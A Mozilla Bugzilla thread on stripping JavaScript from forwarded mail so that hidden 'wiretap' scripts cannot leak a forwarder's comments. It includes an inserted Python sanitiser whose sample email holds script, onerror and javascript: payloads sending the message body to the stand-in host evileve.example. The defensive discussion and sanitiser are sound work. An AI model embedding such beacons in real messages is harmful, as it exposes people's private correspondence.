Open Bug 67702 Opened 24 years ago Updated 2 years ago

Forwarding mail should remove JavaScript from the message

Categories: MailNews Core :: Security, enhancement
Tracking: Not tracked
People: Reporter: hacker, Unassigned
Details: Keywords: privacy, Whiteboard: [sg:privacy]

From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; m18) Gecko/20010202
BuildID:    2001020204

The attached URL describes a recently-discovered security problem with many mail
programs where JavaScript code can be embedded in an HTML mail message that can
track when the message is forwarded and replied to.  Unfortunately, as the
article states, you can't just turn off JavaScript in Mail/News since the
JavaScript is still embedded in the message when you reply or forward.

As a way to counter this security problem, there should be an option (perhaps as
an extension of turning off JavaScript in Mail/News) for Mail to automatically
strip all JavaScript code from outgoing mail.

Reproducible: Didn't try
Steps to Reproduce:
QA > ckritzer
Status: UNCONFIRMED → NEW
Ever confirmed: true
QA Contact: junruh → ckritzer
Hmm, it's an option. This is really the receiving client's responsibility to
fix, not the sending client. Might be a good thing to do though.
a hidden pref to remove (comment out?) JS in messages which are forwarded (or 
replies?) seems reasonable; I could see some IS departments might want to enable 
such a pref.  (made changes to summary)
Summary: Option to delete JavaScript in sent mail → Pref/Option to delete JavaScript when forwarding mail
Future. We need to fix the exploit in our own mail client before we worry about
defending people from other mail clients that haven't addressed the issue.
Status: NEW → ASSIGNED
Target Milestone: --- → Future
Target Milestone: Future → mozilla1.0
Bugs targeted at mozilla1.0 without the mozilla1.0 keyword moved to mozilla1.0.1 
(you can query for this string to delete spam or retrieve the list of bugs I've 
moved)
Target Milestone: mozilla1.0 → mozilla1.0.1
Target Milestone: mozilla1.0.1 → Future
QA Contact: ckritzer → bsharma
Product: MailNews → Core
Why are wiretap exploits "really the receiving client's responsibility to fix,
not the sending client's"?  I would argue that this is primarily the sending
client's responsibility because 

(1) The sending client is the one carelessly combining untrusted scripts with
its own content.

(2) It's really hard to fix this in the receiving client without disabling
JavaScript completely or limiting JavaScript to a tiny whitelist of DOM 0
functions.  See bug 66938, bug 84545, bug 152701, bug 309258, and bug 309228.

IMO, the sending client should strip scripts from at least messages that are
forwarded inline.  (Thunderbird 1.5 Beta 1 includes such scripts twice - wtf?)
Assignee: security-bugs → nobody
Status: ASSIGNED → NEW
QA Contact: bsharma
Target Milestone: Future → ---
Bug 66938 comment 27 and bug 66938 comment 28 seem to agree with me...
Blocks: 84545
Summary: Pref/Option to delete JavaScript when forwarding mail → Forwarding mail should remove JavaScript from the message
Keywords: privacy
Whiteboard: [sg:privacy]
QA Contact: security
Product: Core → MailNews Core
Dan, with CAPS being enabled now, would this still work?
By "CAPS being enabled" do you mean "JavaScript in messages being disabled" (note that since DOM quickstubbing came online, CAPS is often short-circuited: disabling JS uses a different mechanism)?  If so, Thunderbird users are no longer potentially vulnerable as recipients, but that's because JS in messages is not executed.

It would also be worthwhile to sanitize outbound messages as suggested by this bug.
Since these wiretap bugs lacked sufficient in-bug context even when the privacyfoundation URL worked:

Evil Eve sends mail to Alice, knowing she'll forward it to Bob, and wanting to know what Alice says about it in her forward. Bob trusts Alice, so he automatically loads remote images in her mail. Alice uses Tb3, so Eve's script doesn't execute when Alice reads the email, but Bob uses an old Tb (our CAPS attempt at protection was full of holes for years) with JS enabled, or OE with JS enabled, and so when he reads Alice's forward, the script executes, gets the whole text of the email including Alice's added comments, and creates an image with src="evileve.com/wiretap?payload=Bob%20can%20you%20believe%20this%20load%20of...

Alice is the victim, it's her privacy that's being impacted, and she's our user. We can't limit the clients that view email we send for her, so the only way to protect her is to strip out anything that could be executed as script.

(Of course, as any of the thousands of people whose full-time job is to strip out things that might be XSS attempts in content that will be displayed in web pages would tell us, "just strip out script" isn't all that easy.)
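The sending-side fix this bug asks for, as an added example that is not Thunderbird's code and not from anyone in this thread: a sanitiser built on the Python standard library's html.parser, run beside the naive "delete <script>...</script>" regex pass on a constructed message of the kind Eve sends in the scenario above. The sample mail, the domain evileve.example and the function names are assumptions made for the demonstration; the point it makes is the one the last comment raises, namely that the obvious strip leaves the event-handler, javascript: URL, entity-encoded and conditional-comment vectors in place.

```python
"""Strip script vectors from an HTML message before it is quoted into a forward.

Added example for bug 67702, standard library only; not Thunderbird code.
"""
import html
import re
from html.parser import HTMLParser

# Constructed sample of the mail Eve sends Alice.  The <script> is the obvious
# vector; everything after it is what a "just delete <script>" pass misses.
EVE_MAIL = """<html><body>
<p>Hi Alice, thought you'd find this interesting.</p>
<script>
  // when Alice's forward is rendered with JS enabled, read the whole body
  // (her added comments included) and beacon it out in an image request
  var img = new Image();
  img.src = "http://evileve.example/wiretap?payload="
          + encodeURIComponent(document.body.innerText);
</script>
<img src="http://evileve.example/missing.png"
     onerror="new Image().src='http://evileve.example/?'+document.body.innerText">
<a href="javascript:new Image().src='http://evileve.example/?'+document.body.innerText">more</a>
<a href="&#106;avascript:alert(1)">entity-encoded scheme</a>
<a href="  JAVA&#x09;SCRIPT:alert(1)">whitespace inside the scheme</a>
<!--[if IE]><script>alert('conditional comment')</script><![endif]-->
<img src="cid:part1.png" alt="inline &amp; harmless">
</body></html>"""


def naive_strip(html_text):
    """What 'just strip out script' usually means: delete <script> elements."""
    return re.sub(r"<script\b[^>]*>.*?</script\s*>", "", html_text, flags=re.I | re.S)


class ScriptStripper(HTMLParser):
    """Re-serialise the document without <script> elements (and their content),
    on* attributes, javascript:/vbscript: URLs, data: hrefs, comments (IE
    conditional comments can carry script) and plugin/frame elements."""

    URL_ATTRS = {"href", "src", "action", "formaction", "background", "xlink:href"}
    SCRIPT_SCHEMES = ("javascript:", "vbscript:")
    DROP_TAG = {"object", "embed", "applet", "iframe"}   # tag dropped, fallback text kept

    def __init__(self):
        super().__init__(convert_charrefs=False)  # re-emit &amp; etc. verbatim
        self.out = []
        self.in_script = False

    @classmethod
    def dangerous_url(cls, attr, value):
        # browsers ignore case and embedded tabs/newlines in the scheme, so
        # normalise before testing; attr values arrive already entity-decoded
        scheme_part = re.sub(r"[\x00-\x20]", "", value).lower()
        if scheme_part.startswith(cls.SCRIPT_SCHEMES):
            return True
        # data: links may carry text/html with script; inline data: images are fine
        return attr == "href" and scheme_part.startswith("data:")

    def render(self, tag, attrs, self_closing):
        parts = [tag]
        for name, value in attrs:
            if name.startswith("on"):          # onclick, onerror, onload, ...
                continue
            if value is not None and name in self.URL_ATTRS and self.dangerous_url(name, value):
                continue
            parts.append(name if value is None else f'{name}="{html.escape(value, quote=True)}"')
        return "<" + " ".join(parts) + (" />" if self_closing else ">")

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True              # parser delivers the body as data; we drop it
        elif not self.in_script and tag not in self.DROP_TAG:
            self.out.append(self.render(tag, attrs, False))

    def handle_startendtag(self, tag, attrs):
        if not self.in_script and tag != "script" and tag not in self.DROP_TAG:
            self.out.append(self.render(tag, attrs, True))

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False
        elif not self.in_script and tag not in self.DROP_TAG:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.in_script:
            self.out.append(data)

    def handle_entityref(self, name):
        self.out.append(f"&{name};")

    def handle_charref(self, name):
        self.out.append(f"&#{name};")

    def handle_decl(self, decl):
        self.out.append(f"<!{decl}>")
    # comments, processing instructions and unknown declarations: default no-op, i.e. dropped


def strip_scripts(html_text):
    parser = ScriptStripper()
    parser.feed(html_text)
    parser.close()
    return "".join(parser.out)


def residual_vectors(html_text):
    """Crude audit: which marker strings survive (whitespace removed first)."""
    flat = re.sub(r"[\x00-\x20]", "", html_text).lower()
    markers = {"<script", "onerror=", "onclick=", "javascript:", "vbscript:"}
    return {m for m in markers if m in flat}


if __name__ == "__main__":
    print("naive  leaves:", sorted(residual_vectors(naive_strip(EVE_MAIL))))
    print("parser leaves:", sorted(residual_vectors(strip_scripts(EVE_MAIL))))
    print(strip_scripts(EVE_MAIL))
```

This is a denylist, which is the weaker shape: the checks above cover the vectors in the sample, but a mail client shipping this would instead allowlist the elements and attributes it is prepared to forward and drop everything else, which is where the XSS-filtering experience mentioned in the comment leads.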
Removing myself on all the bugs I'm cced on. Please NI me if you need something on MailNews Core bugs from me.
Severity: normal → S3